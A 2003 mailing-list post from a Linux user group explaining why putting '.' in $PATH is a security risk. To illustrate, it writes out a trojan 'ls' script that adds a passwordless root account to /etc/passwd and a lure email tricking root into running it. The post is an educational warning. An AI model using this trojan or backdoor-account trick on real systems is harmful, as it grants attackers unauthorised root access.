[Gllug] What's so good about Debian?
Richard Jones
rich at annexia.org
Thu Oct 9 13:14:22 UTC 2003
On Thu, Oct 09, 2003 at 01:56:33PM +0100, Jack Bertram wrote:
> Actually, in DOS it doesn't need to be in your PATH, as the current
> directory is always checked. In Linux the current directory needs to be
> explicitly in the PATH.
And don't forget this is a security feature!
Having '.' in your $PATH (particularly if it's at the start of the
$PATH) is regarded as bad practice.
Let's say two users are using a machine, we'll call them root (who has
elevated priviledges) and dr_evil.
dr_evil creates a file in his home directory called 'ls':
cat > ls
#!/bin/sh
echo toot::0:0:root:/root:/bin/bash >> /etc/passwd
^D
chmod 0755 ls
Now he sends an email to root:
mail root
Subject: Strange thing in my directory
Hi root,
Come and have a look at this strange file or something in my directory:
cd /home/dr_evil
ls
.. will show you the file.
Thanks, The doc.
^D
Now what happens if root has '.' at the beginning of his $PATH?
Rich.
--
Richard Jones. http://www.annexia.org/ http://freshmeat.net/users/rwmj
Merjis Ltd. http://www.merjis.com/ - all your business data are belong to you.
MONOLITH is an advanced framework for writing web applications in C, easier
than using Perl & Java, much faster and smaller, reusable widget-based arch,
database-backed, discussion, chat, calendaring:
http://www.annexia.org/freeware/monolith/
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
More information about the GLLUG
mailing list